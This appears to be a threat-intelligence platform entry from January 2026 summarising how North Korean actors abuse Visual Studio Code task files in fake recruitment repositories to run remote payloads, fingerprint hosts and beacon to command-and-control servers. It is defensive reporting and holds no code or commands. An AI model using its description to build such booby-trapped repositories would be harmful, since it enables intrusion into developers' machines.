216.73.217.50

Threat Actors Expand Abuse of Microsoft Visual Studio Code

· Published 21/01/2026 12:38 · Modified 21/01/2026 23:19

Export JSON

Essential information

Published
21/01/2026 12:38
Modified
21/01/2026 23:19
Tags
2026-01-21 backdoor c2 contagious interview github gitlab javascript macos node.js visual studio code
Related entities
8 observables, 1 intrusion sets (apt), 11 techniques (mitre), 1 others

Description

North Korean threat actors have evolved their techniques in the campaign, now abusing Microsoft task configuration files. The infection chain begins when a victim opens a malicious Git repository, often disguised as part of a recruitment process. If trust is granted, arbitrary commands are executed on the system. The malware uses payloads hosted on vercel.app to implement logic, including remote code execution, system fingerprinting, and persistent command-and-control communication. The collects host information and beacons to a server every five seconds. Recent observations show further execution of similar payloads, indicating ongoing development of these tactics.

External references